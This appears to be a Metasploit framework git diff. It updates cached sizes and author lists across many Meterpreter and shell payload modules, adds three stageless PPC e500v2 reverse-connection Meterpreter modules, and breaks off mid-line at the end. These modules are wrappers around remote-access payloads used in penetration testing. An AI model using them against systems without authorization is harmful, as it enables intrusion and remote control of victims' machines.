a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb index fe8cbdd08a..5a607842fd 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 789196 + CachedSize = 856196 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_PPC, diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb index 94dbd28258..20d3b4aa74 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 855928 + CachedSize = 857808 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_PPC64LE, diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb index 353b7ccf37..d0fed27439 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 855928 + CachedSize = 857808 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_PPC64LE, diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb index 48c3abe40b..5c649a25c9 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 855928 + CachedSize = 857808 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_PPC64LE, diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..679a3765fc --- /dev/null +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb @@ -0,0 +1,46 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_http' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_ppce500v2_linux' + +module MetasploitModule + + CachedSize = 856196 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ', + 'timwr' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_PPCE500V2, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttp, + 'Session' => Msf::Sessions::Meterpreter_ppce500v2_Linux + ) + ) + end + + def generate + opts = { + scheme: 'http', + stageless: true + } + MetasploitPayloads::Mettle.new('powerpc-e500v2-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb new file mode 100644 index 0000000000..f33ddf8cbb --- /dev/null +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb @@ -0,0 +1,46 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_ppce500v2_linux' + +module MetasploitModule + + CachedSize = 856196 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ', + 'timwr' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_PPCE500V2, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_ppce500v2_Linux + ) + ) + end + + def generate + opts = { + scheme: 'https', + stageless: true + } + MetasploitPayloads::Mettle.new('powerpc-e500v2-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb new file mode 100644 index 0000000000..21eb56cde1 --- /dev/null +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb @@ -0,0 +1,46 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_ppce500v2_linux' + +module MetasploitModule + + CachedSize = 856196 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ', + 'timwr' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_PPCE500V2, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_ppce500v2_Linux + ) + ) + end + + def generate + opts = { + scheme: 'tcp', + stageless: true + } + MetasploitPayloads::Mettle.new('powerpc-e500v2-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb index c8ec4d34ba..0fb3aaea5e 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 729184 + CachedSize = 746944 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_X64, diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb index 3e9f8ab1d6..6745bb5f9b 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 729184 + CachedSize = 746944 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_X64, diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb index e52a985f0c..0cc26899f3 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 729184 + CachedSize = 746944 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_X64, diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb index 3d44d1abe8..c7da73f173 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 772828 + CachedSize = 794800 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_X86, diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb index 8d2f70e310..ac313d906c 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 772828 + CachedSize = 794800 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_X86, diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb index 55bdf50aa5..d72061e2cc 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 772828 + CachedSize = 794800 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_X86, diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb index d5adac9574..a129f3834a 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 893560 + CachedSize = 907360 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ZARCH, diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb index 0e8fe66ace..9372c91415 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 893560 + CachedSize = 907360 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ZARCH, diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb index abb089db49..6e099ef231 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 893560 + CachedSize = 907360 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ZARCH, diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb index 6cd4278eb5..dffa4838b1 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb @@ -13,7 +13,7 @@ require 'msf/base/sessions/command_shell' module MetasploitModule - CachedSize = 805 + CachedSize = 803 include Msf::Payload::Single include Msf::Payload::NodeJS diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb index d2fa02fa4b..29cbe3588d 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 833 + CachedSize = 831 include Msf::Payload::Single include Msf::Payload::NodeJS diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb index 4a08503586..f1b9a907df 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 618412 + CachedSize = 793284 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'osx', 'Arch' => ARCH_X64, diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb index 6436a8b549..264643fb7d 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 618412 + CachedSize = 793284 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'osx', 'Arch' => ARCH_X64, diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb index a70eb46ee7..a4d7677fd4 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 618412 + CachedSize = 793284 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'osx', 'Arch' => ARCH_X64, diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb index 3d097c72a7..f5e7303a36 100644 --- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 56570 + CachedSize = 57798 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb index 354fd0852e..f016ee0023 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 56530 + CachedSize = 57762 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb index dbf19dc526..d13916ecb6 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 56534 + CachedSize = 57762 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb index f63420ede9..721b61e0de 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 56486 + CachedSize = 57714 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb index 4aa49bfccd..79e23e6a0c 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 179267 + CachedSize = 179779 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb index 12cb6341e7..2bcca8d51c 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 180311 + CachedSize = 180825 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb index 539bfd288f..2f470a05b9 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 180311 + CachedSize = 180825 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb index 23d9de6df9..dce4c880d4 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 179267 + CachedSize = 179779 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb index 256f5b6225..bacdd2591d 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 179267 + CachedSize = 179779 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/powershell_bind_tcp.rb b/modules/payloads/singles/windows/powershell_bind_tcp.rb index 9b7413ffef..caf3a2f68d 100644 --- a/modules/payloads/singles/windows/powershell_bind_tcp.rb +++ b/modules/payloads/singles/windows/powershell_bind_tcp.rb @@ -15,7 +15,7 @@ require 'msf/core/handler/bind_tcp' ### module MetasploitModule - CachedSize = 1501 + CachedSize = 1518 include Msf::Payload::Windows::Exec include Rex::Powershell::Command diff --git a/modules/payloads/singles/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/powershell_reverse_tcp.rb index f7a5dcab0c..beba1f83bc 100644 --- a/modules/payloads/singles/windows/powershell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/powershell_reverse_tcp.rb @@ -15,7 +15,7 @@ require 'msf/core/handler/reverse_tcp_ssl' ### module MetasploitModule - CachedSize = 1509 + CachedSize = 1526 include Msf::Payload::Windows::Exec include Msf::Payload::Windows::Powershell diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb index 058078b353..86df5d345e 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 205379 + CachedSize = 205891 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb index 0398f24b52..b88ce277d6 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 206423 + CachedSize = 206937 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb index 5679a3a8be..f3fd8e639b 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 206423 + CachedSize = 206937 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb index bb151559da..102840f525 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 205379 + CachedSize = 205891 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb index 337ebe2c73..b38fe1f070 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 205379 + CachedSize = 205891 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb index 477f7c0961..face477a1b 100644 --- a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb @@ -15,7 +15,7 @@ require 'msf/core/handler/bind_tcp' ### module MetasploitModule - CachedSize = 1501 + CachedSize = 1518 include Msf::Payload::Windows::Exec_x64 include Rex::Powershell::Command diff --git a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb index e3bdaee025..5713b440c1 100644 --- a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb @@ -15,7 +15,7 @@ require 'msf/core/handler/reverse_tcp_ssl' ### module MetasploitModule - CachedSize = 1509 + CachedSize = 1526 include Msf::Payload::Windows::Exec_x64 include Msf::Payload::Windows::Powershell diff --git a/modules/payloads/stagers/java/bind_tcp.rb b/modules/payloads/stagers/java/bind_tcp.rb index 635afb61ca..70521e2055 100644 --- a/modules/payloads/stagers/java/bind_tcp.rb +++ b/modules/payloads/stagers/java/bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/java/bind_tcp' module MetasploitModule - CachedSize = 5118 + CachedSize = 5303 include Msf::Payload::Stager include Msf::Payload::Java diff --git a/modules/payloads/stagers/java/reverse_http.rb b/modules/payloads/stagers/java/reverse_http.rb index 2d1498c7d5..8f011c61f2 100644 --- a/modules/payloads/stagers/java/reverse_http.rb +++ b/modules/payloads/stagers/java/reverse_http.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/java/reverse_http' module MetasploitModule - CachedSize = 5123 + CachedSize = 5386 include Msf::Payload::Stager include Msf::Payload::Java diff --git a/modules/payloads/stagers/java/reverse_https.rb b/modules/payloads/stagers/java/reverse_https.rb index d276ea2d52..a58aa42357 100644 --- a/modules/payloads/stagers/java/reverse_https.rb +++ b/modules/payloads/stagers/java/reverse_https.rb @@ -9,7 +9,7 @@ require 'msf/core/payload/java/reverse_https' module MetasploitModule - CachedSize = 5932 + CachedSize = 6195 include Msf::Payload::Stager include Msf::Payload::Java diff --git a/modules/payloads/stagers/java/reverse_tcp.rb b/modules/payloads/stagers/java/reverse_tcp.rb index 5ad61693af..4f5110192a 100644 --- a/modules/payloads/stagers/java/reverse_tcp.rb +++ b/modules/payloads/stagers/java/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/java/reverse_tcp' module MetasploitModule - CachedSize = 5118 + CachedSize = 5303 include Msf::Payload::Stager include Msf::Payload::Java diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb index 2b58ea764b..819f4848b9 100644 --- a/modules/payloads/stagers/windows/reverse_http.rb +++ b/modules/payloads/stagers/windows/reverse_http.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_http' module MetasploitModule - CachedSize = 339 + CachedSize = 347 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb index 907fa651de..31e6d29a13 100644 --- a/modules/payloads/stagers/windows/reverse_https.rb +++ b/modules/payloads/stagers/windows/reverse_https.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_https' module MetasploitModule - CachedSize = 359 + CachedSize = 367 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/reverse_https_proxy.rb b/modules/payloads/stagers/windows/reverse_https_proxy.rb index 766c741332..f79ba8c95d 100644 --- a/modules/payloads/stagers/windows/reverse_https_proxy.rb +++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_https_proxy' module MetasploitModule - CachedSize = 397 + CachedSize = 384 include Msf::Payload::Stager include Msf::Payload::Windows @@ -80,8 +80,8 @@ module MetasploitModule p[i, u.length] = u # patch proxy info - proxyhost = datastore['PayloadProxyHost'].to_s - proxyport = datastore['PayloadProxyPort'].to_s || "8080" + proxyhost = 